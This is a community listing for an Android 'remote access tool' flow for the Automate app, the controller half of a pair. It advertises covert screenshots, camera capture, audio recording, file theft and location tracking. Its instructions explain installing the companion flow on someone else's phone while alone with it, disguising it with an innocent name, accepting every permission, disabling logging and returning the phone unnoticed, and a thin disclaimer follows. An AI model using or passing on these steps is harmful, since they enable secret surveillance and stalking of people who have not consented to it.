by Christina Rendon
Version 1 (November 29, 2020)
Download (6 downloads)
Build 201812011235
Premium flow. No root required.
Sometimes I feel like weaponizing Automate, and this is one of those flows.
This is exactly what the title suggests: a backdoor / Remote Access Tool to another mobile device.
Options:
• Take screenshot
• Take picture (front/back selectable)
• Browse and download all files
• Record Audio (selectable length)
• Get location
This is the MASTER part.
SLAVE can be found here:
http://llamalab.com/automate/community/flows/26265
Pro's
+ Everything is sent encrypted.
+ It deletes all files made (screenshots/audio/pictures) on SLAVE device, after they are sent to MASTER.
+ If SLAVE device is configured correctly, it'll contact MASTER by itself upon running, and all needed permissions will pop up one by one automatically (once).
+ Listener account isn't placed as plain text, but as a HEX encoded version.
+ Uses SLAVE's Google Drive account to transfer files.
+ SLAVE is 30 blocks exactly (non premium!) so it can run on any Android device!
Cons
- You will need time alone with the target device, to install Automate, the SLAVE flow, and guide it through the permission popups (see above) when it contacts MASTER.
- HEX isn't encryption, it just makes what's written unreadable until you decode it, so I suggest to create a special new Google account to be used as listener in MASTER.
Instructions:
• Download and start the MASTER (premium) flow.
• Input the account you want to use as a listener, in the MASTER flow (in menu).
• Export a HEX version of that account to clipboard (in menu)
• Download the SLAVE flow.
• Rename SLAVE flow to something innocent sounding, and delete the info text.
• Paste the HEX (from clipboard) in block 30 / the one directly beneath the FlowStart block of the SLAVE flow, replacing the example HEX.
Your R.A.T is now ready to be sent to the target.
• Start MASTER first, let it run in background (in menu).
• Dowload and start edited SLAVE on target device (send edited SLAVE flow to target using whatever you want).
• Pop ups on target device will ask for permissions needed to run this flow, accept them all, disable logging, check that Automate starts on phone start.
• Place target phone back where it's owner left it.
Disclaimer:
I understand this flow can be used in a malicious way, but that isn't my intention. Use this for good, not evil. Like checking if your kid isn't talking to strangers online. Or worse.
Build 201812011235 It's alive!
5 stars | 0 | |
4 stars | 0 | |
3 stars | 0 | |
2 stars | 0 | |
1 star | 0 | |
Reports | 4 |
Reviews and ratings can be submitted in the app.